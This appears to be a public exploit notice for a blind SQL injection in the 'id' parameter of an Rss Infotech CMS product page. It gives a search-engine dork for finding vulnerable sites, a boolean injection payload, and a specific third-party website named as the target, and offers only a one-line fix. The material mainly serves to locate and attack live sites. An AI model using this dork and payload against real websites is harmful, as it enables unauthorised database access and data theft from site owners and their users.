[+] Exploit Title ; Rss Infotech cms Sql Injection vulnerability
[+] Date : 2018-03-31
[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage : https://www.rssindia.com.com/
[+] Dork : intext:"Designed by Rss Infotech Pvt.Ltd." inurl:id=
[+] Forum : irethicalhackers.com/forums
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Description :
[!] Rss Infotech is a personal content management
[+] Poc :
[+] Security Level :
[!] Medium
[+] Exploitation Technique:
[!] Remote
[+] Request Method :
[!] GET
[+] Vulnerability Files :
[!] single-product.php
[+] web application technology: Apache
[+] back-end DBMS: MySQL
[+] Parameter: id (GET)
[!] Type: boolean-based blind
[!] Title: AND boolean-based blind - WHERE or HAVING clause
[!] Payload: id=1 AND 6987=6987
[+] Target :
[!] http://muscledoctor.us/single-product.php?id=111
[+] Fix :
[!] Restrict user input or replace bad characters
[+] We Are : [+] 0P3N3R [+] Mehrdad_Ice [+] S0!hp